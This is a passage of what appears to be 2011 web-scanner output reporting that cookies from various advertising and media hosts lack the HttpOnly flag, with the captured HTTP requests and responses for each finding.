bh="b!!!#l!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(V!!!!#<jHAu!#5(X!!!!#<jLPe!#5(]!!!!#<jLPe!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#C-Y!!!!#<iC/U!#I=D!!!!#<kjhR!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!%<kc#o!#MTF!!!!%<kc#o!#MTH!!!!%<kc#o!#MTI!!!!%<kc#o!#MTJ!!!!%<kc#o!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#RY.!!!!'<kdT!!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!%<kc#o!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#]W%!!!!'<kdT!!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#^Bo!!!!'<kdT!!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<f!!!!#<jLPe!#b<g!!!!#<kI4S!#b<h!!!!#<jHAu!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b<x!!!!#<jLPe!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g[h!!!!'<kdT!!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p#b!!!!'<kdT!!#p]T!!!!$<kL2n"
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:23:50 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT Set-Cookie: bh="b!!!#m!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(V!!!!#<jHAu!#5(X!!!!#<jLPe!#5(]!!!!#<jLPe!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#C-Y!!!!#<iC/U!#I=D!!!!#<kjhR!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!%<kc#o!#MTF!!!!%<kc#o!#MTH!!!!%<kc#o!#MTI!!!!%<kc#o!#MTJ!!!!%<kc#o!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#RY.!!!!'<kdT!!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!%<kc#o!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#]W%!!!!'<kdT!!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#^Bo!!!!'<kdT!!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<f!!!!#<jLPe!#b<g!!!!#<kI4S!#b<h!!!!#<jHAu!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b<x!!!!#<jLPe!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g[h!!!!'<kdT!!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p#b!!!!'<kdT!!#p]T!!!!$<kL2n"; path=/; expires=Tue, 29-Jan-2013 01:23:50 GMT Cache-Control: no-store Last-Modified: Sun, 30 Jan 2011 01:23:50 GMT Pragma: no-cache Content-Length: 167 Content-Type: application/x-javascript Age: 0 Proxy-Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rss HTTP/1.1 Host: add.my.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 01:21:50 GMT Set-Cookie: B=49rk3tt6k9f9e&b=3&s=sq; expires=Tue, 29-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Cache-Control: private Content-Length: 3312
<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head><title>Yahoo! - 404 Not Found</title><style> /* nn4 hide */ /*/*/ body {font:small/1.2em arial,h ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
%24SPIDER=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /a.aspx?Task=Click&ZoneID=37&CampaignID=1887&AdvertiserID=2&BannerID=2555&SiteID=2&RandomNumber=1776744983&Keywords= HTTP/1.1 Host: ads.asp.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.infragistics.com/redirects/SLNetDec1610SL4-WPF-DC">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ads/charts_1110_728x90.gif HTTP/1.1 Host: ads.neudesicmediagroup.com Proxy-Connection: keep-alive Referer: http://www.silverlight.net/adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Length: 30921 Content-Type: image/gif Last-Modified: Wed, 17 Nov 2010 22:49:50 GMT Accept-Ranges: bytes ETag: "92e2cdbda986cb1:0" Server: Microsoft-IIS/7.0 Set-Cookie: ARRAffinity=4d2595d3360958e1a13d6a0752f068ec43e5a9f153c5cfa82e99d6cafccefb25;Path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:15:08 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA" Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: rsi_us_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsi_us_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; Domain=.revsci.net; Expires=Thu, 22-Jan-2043 01:29:45 GMT; Path=/ Content-Type: application/x-javascript;charset=ISO-8859-1 Vary: Accept-Encoding Date: Sun, 30 Jan 2011 01:29:44 GMT Content-Length: 541
function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;} i.src=u;p[p.length]=i;}} function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: alex-johnson.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:04:23 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=71247d98d365d957459ad2146ae86d57; expires=Sat, 25-Jan-2031 02:04:23 GMT; path=/; domain=.newsvine.com Content-Length: 0 Content-Type: text/html Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adsc/d775684/10/38973908/decide.php HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adsc/d852149/4/40142779/decide.php?ord=1296350847 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0
The following cookie was issued by the application and does not have the HttpOnly flag set:
_xsrf=442abb1a273f4a0d80590533c0eff126; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shorten HTTP/1.1 Host: api.bit.ly Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 30 Jan 2011 01:21:50 GMT Content-Type: text/html;charset=utf-8 Connection: close Content-Length: 104 Allow: GET, HEAD, POST P3P: CP="CAO PSA OUR" Set-Cookie: _xsrf=442abb1a273f4a0d80590533c0eff126; Path=/
{"errorCode": 203, "errorMessage": "You must be authenticated to access shorten", "statusCode": "ERROR"}
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1296351006.909,wait-%3E10000,&1296351005834 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; BMX_G=method->-1,ts->1296351006; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 30 Jan 2011 01:30:07 GMT Content-Type: image/gif Connection: close Vary: Accept-Encoding Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296351006%2E909%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com; Content-length: 42 P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 30 Jan 2011 01:30:06 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; expires=Sat 30-Apr-2011 01:30:06 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296351006; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26496
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /news/news.aspx HTTP/1.1 Host: articles.moneycentral.msn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:05:33 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA43 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=a9c5053b2f704163858001bde4170892; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=FDEFD5726B4F41F2A069537932EBC97A; domain=.moneycentral.msn.com; expires=Thu, 18-Aug-2011 02:05:33 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 39029
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: athima-chansanchai.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:04:32 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=604df4063ca91afa132a73bbd94df4dd; expires=Sat, 25-Jan-2031 02:04:32 GMT; path=/; domain=.newsvine.com Content-Length: 0 Content-Type: text/html Connection: close
AA002=1294100002-3786607; expires=Mon, 31 Jan 2011 01:29:41 GMT; path=/; domain=atl.whitepages.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET //AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link/ATCI=1294100002-3786607 HTTP/1.1 Host: atl.whitepages.com Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; AA002=0-0
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86) Date: Sun, 30 Jan 2011 01:29:41 GMT X-DirectServer: whitepg_DS1 Content-Type: application/x-javascript Content-Length: 12856 Pragma: no-cache Cache-control: no-cache Set-Cookie: GUID=00058525BF050D44401A5E1461626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com Set-Cookie: LE1=+6jd3r4Ya10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com Set-Cookie: LE2=+6jd3raZf10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com Set-Cookie: LE3=+6jd3r4Wa10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com Set-Cookie: LE4=+6jd3rKba10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com Set-Cookie: AA002=1294100002-3786607; expires=Mon, 31 Jan 2011 01:29:41 GMT; path=/; domain=atl.whitepages.com P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
